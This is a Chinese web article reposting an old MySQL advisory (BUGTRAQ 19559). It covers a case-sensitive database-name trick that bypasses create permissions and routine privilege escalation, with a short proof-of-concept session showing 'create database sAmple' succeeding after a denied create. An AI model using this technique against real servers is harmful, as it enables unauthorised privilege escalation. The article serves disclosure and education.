如何進行MySQL權限提升及安全限制繞過漏洞

發(fā)布時間：2021-11-17 09:31:04 來源：億速云閱讀：161 作者：柒染欄目：MySQL數(shù)據(jù)庫

這篇文章將為大家詳細講解有關如何進行MySQL權限提升及安全限制繞過漏洞，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

MySQL權限提升及安全限制繞過漏洞

受影響系統(tǒng)：

MySQL AB MySQL <= 5.1.10

描述：BUGTRAQ ID: 19559

MySQL是一款使用非常廣泛的開放源代碼關系數(shù)據(jù)庫系統(tǒng)，擁有各種平臺的運行版本。在MySQL上，擁有訪問權限但無創(chuàng)建權限的用戶可以創(chuàng)建與所訪問數(shù)據(jù)庫僅有名稱字母大小寫區(qū)別的新數(shù)據(jù)庫。成功利用這個漏洞要求運行MySQL的文件系統(tǒng)支持區(qū)分大小寫的文件名。

此外，由于在錯誤的安全環(huán)境中計算了suid例程的參數(shù)，攻擊者可以通過存儲的例程以例程定義者的權限執(zhí)行任意DML語句。成功攻擊要求用戶對所存儲例程擁有EXECUTE權限。

測試方法：

警告:以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

1 創(chuàng)建數(shù)據(jù)庫

CODE:

$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)

關于如何進行MySQL權限提升及安全限制繞過漏洞就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

向AI問一下細節(jié)

如何進行MySQL權限提升及安全限制繞過漏洞

猜你喜歡

最新資訊

相關推薦

相關標簽